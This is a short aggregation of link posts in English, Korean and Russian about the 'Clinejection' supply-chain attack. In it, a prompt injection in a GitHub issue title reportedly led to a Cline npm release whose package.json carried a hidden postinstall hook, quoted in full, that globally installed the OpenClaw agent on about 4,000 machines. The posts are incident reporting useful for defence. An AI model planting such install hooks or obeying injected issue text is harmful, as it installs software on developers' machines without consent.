A GitHub Issue Title Compromised 4,000 Developer Machines | grith

https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

> A prompt injection in a GitHub issue triggered a chain reaction that ended with 4,000 developers getting OpenClaw installed without consent. The attack composes well-understood vulnerabilities into something new: one AI tool bootstrapping another.

#AI #GitHub #Cline #Clinejection

GitHub 이슈 제목 하나로 개발자 4,000대가 뚫렸다, Clinejection 공격 해부

https://aisparkup.com/posts/9895

[Перевод] Агент под прикрытием: Как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля 2026 года в репозитории npm была опубликована версия [email protected] . С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт. Лишь в файле package.json притаилась одна лишняя строчка: "postinstall": "npm install -g openclaw@latest" В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw. Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса. Пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа.

https://habr.com/ru/companies/bothub/articles/1007638/

#github #cline #openclaw #аднан_хан #stepsecurity #clinejection

A GitHub Issue Title Compromised 4k Developer Machines

https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

#HackerNews #GitHubIssue #Compromise #DeveloperMachines #Cybersecurity #AItools #Clinejection